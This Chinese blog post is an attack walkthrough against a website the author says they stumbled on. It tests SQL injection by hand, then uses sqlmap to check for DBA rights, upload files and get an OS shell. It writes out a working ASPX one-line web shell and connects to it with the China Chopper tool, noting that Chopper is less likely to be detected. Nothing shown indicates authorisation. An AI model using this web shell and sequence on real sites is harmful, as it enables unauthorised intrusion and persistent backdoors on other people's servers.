sql注入+菜刀连接

网址是偶然发现的,发现类似可注入的网址
在这里插入图片描述

在后缀加入 and 1=1参数,网站没有变化,加and 1=2,网站报错,存在注入特征
在这里插入图片描述
在这里插入图片描述

二话不说开启kali,用sqlmap注入神器进行渗透。

首先使用 –is-dba的参数查看是否是管理员,因为管理员权限高sql注入+菜刀连接_第1张图片
sql注入+菜刀连接_第2张图片
`结果为true,是管理员。

当我们知道网站的权限之后,拿到站有几个思路,一个是用–dump把数据库敏感数据全部爆破出来,知道管理员密码可以直接直连,但是除了弱口令之外都不好硬爆破。所以还是建议看是否有上传权限,查看网站容器写一句话然后上菜刀,个人建议上菜刀,菜刀的动静比较小,不容易被杀。可上传的话,且知道对方的服务器类型,也可以使用msf生成的payload上传到服务器。

sql上传可以用这个命令 --file-wirte file --file–dest “C:/test/” (意思是把本地的file文件上传到目标主机的C盘中的test文件夹中)

有的网站有WAF,也就是web应用防火墙,导致上传不一定能成功。还有一种方法是用–os-shell可以获取主机的shell界面,
sql注入+菜刀连接_第3张图片
查询当前系统权限,显示为管理员
sql注入+菜刀连接_第4张图片
这个网站所用脚本是aspx,管理员有写入权限,这里我们直接写一句话

echo "<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>" > hello.aspx

写完一句话上菜刀,添加shell
sql注入+菜刀连接_第5张图片

添加完双击可以看到我们刚才写入的hello.aspx一句话
sql注入+菜刀连接_第6张图片

你可能感兴趣的:(复现与实战)